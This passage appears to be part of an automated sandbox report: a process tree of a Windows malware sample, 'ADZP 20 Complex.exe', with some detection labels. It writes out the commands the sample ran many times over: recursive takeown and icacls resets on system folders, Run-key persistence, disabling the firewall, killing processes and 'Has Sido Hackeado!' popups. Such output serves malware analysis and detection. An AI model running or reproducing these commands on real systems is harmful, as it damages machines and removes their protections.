        PID:14772
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:11928
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:6408
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        
        PID:12628
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:636
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:14056
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:14064
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13820
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:13984
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:14076
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13464
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:14316
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:9124
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:12656
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        
        PID:13724
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:10380
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        
        PID:11016
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:2380
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:14200
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        
        PID:5096
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        
        PID:14780
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:4764
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5372
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:10940
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:13512
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:10688
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        9⤵
        Kills process with taskkill
        
        PID:14692
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        9⤵
        Views/modifies file attributes
        
        PID:10320
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8748
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:920
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8324
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:8660
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:11352
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3D8C.tmp\3D8D.tmp\3D8E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:12608
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        10⤵
        
        PID:7944
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:13232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:2084
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        10⤵
        
        PID:3928
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:11576
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11764
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:12080
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:6724
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:12360
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6AA7.tmp\6AA8.tmp\6AA9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:13296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:15348
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        10⤵
        
        PID:6020
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D0AF.tmp\D0B0.tmp\D0B1.bat C:\Windows\System32\Twain_20.dll"
        11⤵
        
        PID:1488
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:9436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:14868
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:12780
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:13048
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11180
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:12668
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14380
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:14952
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:2912
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9312
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12648
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:15064
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:8068
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:8112
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8124
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8136
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8144
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F260.tmp\E6.tmp\E7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:7816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:8808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4808
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:2052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4884
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:9340
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:9296
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:9476
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:9848
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:10396
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9760
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12308
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:12344
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:9300
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:15308
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:15196
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14800
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:5724
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:4340
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:7360
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:14752
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:6244
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:7648
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7172
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7064
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6236
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7432
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6692
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F741.tmp\115.tmp\116.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:6080
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        8⤵
        
        PID:9452
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B8F.tmp\9B90.tmp\9B91.bat C:\Windows\System32\Twain_20.dll"
        9⤵
        
        PID:9548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        10⤵
        
        PID:8132
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        11⤵
        
        PID:14460
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2CFD.tmp\2CFE.tmp\2CFF.bat C:\Windows\System32\Twain_20.dll"
        12⤵
        
        PID:14552
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        10⤵
        Modifies Windows Firewall
        
        PID:12120
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        8⤵
        
        PID:12612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:9252
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:9812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:9956
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7060
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:6608
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:7336
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:12520
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:13732
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12204
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10096
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14696
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:1424
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:13640
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9688
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6652
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:516
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6508
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:5804
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:8612
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:8636
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:8672
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:8740
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:9020
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4908
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:5080
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3944
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:1012
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:1372
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\55B1.tmp\55B2.tmp\55B3.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:3080
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:5416
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:5856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:5972
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Modifies file permissions
        
        PID:4508
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:4140
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:1568
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:3092
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:5160
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:5360
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4880
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:5296
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4144
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:6004
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4336
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:2056
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:6132
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:5044
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2020
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:4524
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:5628
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:3912
    - - C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        5⤵
        
        PID:5828
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:1648
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B258.tmp\B259.tmp\B25A.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:3392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:3616
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:9072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:8848
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:2536
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5040
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8972
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:2312
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:9916
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:5128
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12208
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:12756
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:8920
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:13504
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14112
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9484
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:3792
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:11804
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:12420
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:9524
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:14044
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:14128
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:12312
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\223F.tmp\2240.tmp\2241.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:14184
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:5936
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:13524
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:2300
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:7004
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8692
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2164.tmp\2165.tmp\2166.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:8232
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6444
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9688
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7312
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:11044
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9296
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\21F1.tmp\21F2.tmp\21F3.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11584
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:5872
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:220
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10660
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:1028
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12720
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:14496
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3944
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5828
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6152
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:6248
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
